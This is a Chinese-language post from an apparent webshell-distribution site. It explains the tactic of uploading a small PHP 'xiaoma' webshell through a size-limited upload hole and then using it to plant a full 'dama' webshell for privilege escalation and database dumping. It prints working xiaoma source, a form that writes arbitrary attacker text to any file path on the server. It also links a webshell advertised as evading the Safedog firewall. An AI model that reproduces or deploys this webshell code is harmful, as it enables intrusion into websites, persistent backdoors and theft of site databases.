为什么要先上传php小马再传php大马? - 中国木马资源网

作者:admin2016-8-6 15:05分类: 免杀PHP大马,过狗PHP木马下载 标签: php大马 php小马

a8773912b31bb0512bddb3a3347adab44bede044.jpg


php小马是用来传php大马的,有些网站后台为了防止黑客入侵做了上传文件体积限制,而php小马只有几KB!

php小马,实际上可以说是一个上传点,为了辅助php大马而生的一段代码,php大马才是真正用于管理网站权限的文件!

先小后大的规则实际是上针对某些上传漏洞的限制而来的,假如有一个上传漏洞,可以帮你上传你的php文件,但又对上传文件的大小做了限制,这个时候直接上传你的php大马就不行了,所以我们就需要一个体积小的文件来替代现有的上传漏洞,这个怎么实现呢? 也就是所说的php小马了。php小马只是提供一个上传php大马的页面,php大马功能更多:实现提权、脱库等其他功能。


顺便分享php小马代码:

<?php 
header("content-Type: text/html; charset=gb2312"); 
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); 
?> 
<form method="POST"> 
保存文件名: <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>"> 
<br><br> 
<textarea name="text" COLS="70" ROWS="18" ></textarea> 
<br><br> 
<input type="submit" name="submit" value="保存"> 
<form> 
<?php 
if(isset($_POST['file'])) 
{ 
$fp = @fopen($_POST['file'],'wb'); 
echo @fwrite($fp,$_POST['text']) ? '保存成功!' : '保存失败!'; 
@fclose($fp); 
} 
?> 
免杀php大马下载地址(过安全狗):

http://www.asp-muma.com/m/jiaoben/xty.zip

4a471444752142.png

来源:php大马 转载注明出处!

温馨提示如有转载或引用以上内容之必要,敬请将本文链接作为出处标注,谢谢合作!

已有 0/2840 人参与

发表评论:




欢迎使用手机扫描访问本站,还可以关注微信哦~